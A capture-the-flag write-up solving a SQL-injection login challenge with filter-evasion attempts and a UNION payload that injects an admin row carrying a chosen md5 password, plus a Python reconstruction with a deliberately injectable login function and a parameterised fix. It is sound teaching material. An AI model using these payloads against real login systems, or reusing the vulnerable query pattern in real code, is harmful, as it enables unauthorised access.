Problem analysis
This challenge is a login form asking for a username and password; the title tells us it involves SQL injection.
Trying random credentials, 123/123, returns "wrong user!".
Trying admin/123 returns "wrong pass!" instead, so the username check and the password check are reported separately.
Probing for the injection point shows the username is wrapped in single quotes, so I tried admin' or 1=1#
and got back "do not hack me!".
So "or" is evidently filtered. Trying a case change to get around it, admin' Or 1=1#
was still blocked, and more testing showed the equals sign is filtered as well. admin' Or 2>1#
returned "wrong pass!". This puzzled me: the universal-password condition had clearly got past the WHERE clause, so why was the password still rejected? Did the password itself have to match?
Solution
search.php contains a base32-encoded comment; decoding it gives select * from user where username = '$name'
That must be the hint. It also explains the earlier behaviour: the query only filters on the username, so an injected condition decides which row comes back, but the password is evidently compared afterwards against that row's stored password, and a bypassed WHERE clause alone is not enough. Since a password has to match, the plan is to construct a row whose password we control.
Testing the idea in my own environment:
select * from user;
+----+----------+----------------------------------+
| id | username | password                         |
+----+----------+----------------------------------+
|  1 | amdin    | admin                            |
|  2 | hehe     | 202cb962ac59075b964b07152d234b70 |
+----+----------+----------------------------------+
2 rows in set (0.00 sec)
select * from user union select 1,2,3;
+----+----------+----------------------------------+
| id | username | password                         |
+----+----------+----------------------------------+
|  1 | amdin    | admin                            |
|  2 | hehe     | 202cb962ac59075b964b07152d234b70 |
|  1 | 2        | 3                                |
+----+----------+----------------------------------+
3 rows in set (0.00 sec)
So a UNION appends a virtual row to the real result set (no such record exists in the table). Could the same trick construct an admin account whose password we control?
select * from user union select 1,'admin','admin';
+----+----------+----------------------------------+
| id | username | password                         |
+----+----------+----------------------------------+
|  1 | amdin    | admin                            |
|  2 | hehe     | 202cb962ac59075b964b07152d234b70 |
|  1 | admin    | admin                            |
+----+----------+----------------------------------+
3 rows in set (0.00 sec)
My guess was right, so let's build a payload with a controlled password and try it:
name=' union select 1,"admin","admin" %23&pw=admin
This still returns "wrong pass!".
The stored password is presumably an md5 hash, so try the md5 of the password instead (21232f297a57a5a743894a0e4a801fc3 is md5("admin")): name=' union select 1,"admin","21232f297a57a5a743894a0e4a801fc3" %23&pw=admin
That returns the flag.
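To make the whole chain reproducible offline, here is an added Python reconstruction of the login logic (my own example, not the challenge's search.php, whose source is not on the page). Everything beyond the leaked query is an assumption: the blacklist rejects lowercase "or" and "=" in the username (case-sensitive, because "Or" got through while "=" did not); the script fetches one row by username only and then compares md5(pw) with that row's password column; the admin row holds the md5 of a made-up secret; the flag string and the table contents are constructed. SQLite stands in for MySQL, so the payloads use "-- " where the writeup uses "#" (URL-encoded %23), since SQLite does not treat "#" as a comment. A parameterised variant is included to show why the same UNION payload then just reads as an unknown username.

```python
import hashlib
import re
import sqlite3

# Constructed stand-in data; the real admin password and flag are not on the page.
ADMIN_SECRET = "unknown-secret"
FLAG = "flag{example}"

# Assumed blacklist: lowercase "or" and "=" are rejected, matching the observed
# behaviour (admin' or 1=1# blocked, admin' Or 1=1# blocked, admin' Or 2>1# allowed).
BLACKLIST = re.compile(r"or|=")


def md5(text):
    return hashlib.md5(text.encode()).hexdigest()


def build_db():
    """In-memory copy of the user table (constructed sample data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (id INTEGER, username TEXT, password TEXT)")
    conn.execute("INSERT INTO user VALUES (1, 'admin', ?)", (md5(ADMIN_SECRET),))
    # md5("123"), the same hash that appears in the writeup's local table
    conn.execute("INSERT INTO user VALUES (2, 'hehe', '202cb962ac59075b964b07152d234b70')")
    return conn


def login_vulnerable(conn, name, pw):
    """Assumed reconstruction of the challenge: filter the name, select the row
    by username with string concatenation, then compare md5(pw) against the
    password column of whatever row the query returned first."""
    if BLACKLIST.search(name):
        return "do not hack me!"
    sql = "select * from user where username = '%s'" % name  # injectable on purpose
    row = conn.execute(sql).fetchone()
    if row is None:
        return "wrong user!"
    if row[2] != md5(pw):
        return "wrong pass!"
    return FLAG


def login_fixed(conn, name, pw):
    """Same checks with a bound parameter: the UNION text is just a username
    that matches nothing, so the attacker can no longer supply the row."""
    row = conn.execute("select * from user where username = ?", (name,)).fetchone()
    if row is None:
        return "wrong user!"
    if row[2] != md5(pw):
        return "wrong pass!"
    return FLAG


# Payloads from the writeup, with "-- " replacing MySQL's "#" comment marker.
UNION_PLAINTEXT = "' union select 1,'admin','admin' -- "
UNION_MD5 = "' union select 1,'admin','%s' -- " % md5("admin")

if __name__ == "__main__":
    db = build_db()
    attempts = [
        ("123", "123"),                 # wrong user!
        ("admin", "123"),               # wrong pass!
        ("admin' or 1=1-- ", "123"),    # do not hack me!  (lowercase or, =)
        ("admin' Or 2>1-- ", "admin"),  # wrong pass!  (real admin row comes back)
        (UNION_PLAINTEXT, "admin"),     # wrong pass!  (md5("admin") != "admin")
        (UNION_MD5, "admin"),           # flag  (injected row's hash matches md5(pw))
    ]
    for name, pw in attempts:
        print("%-52r -> %s" % (name, login_vulnerable(db, name, pw)))
    print("fixed: %r -> %s" % (UNION_MD5, login_fixed(db, UNION_MD5, "admin")))
```

The UNION row works because the password comparison trusts whatever row the query returns; the universal password only widens the WHERE clause and still hands back the real admin row with a hash the attacker cannot match. Binding the username as a parameter removes the attacker's control over the result set, which is the actual fix.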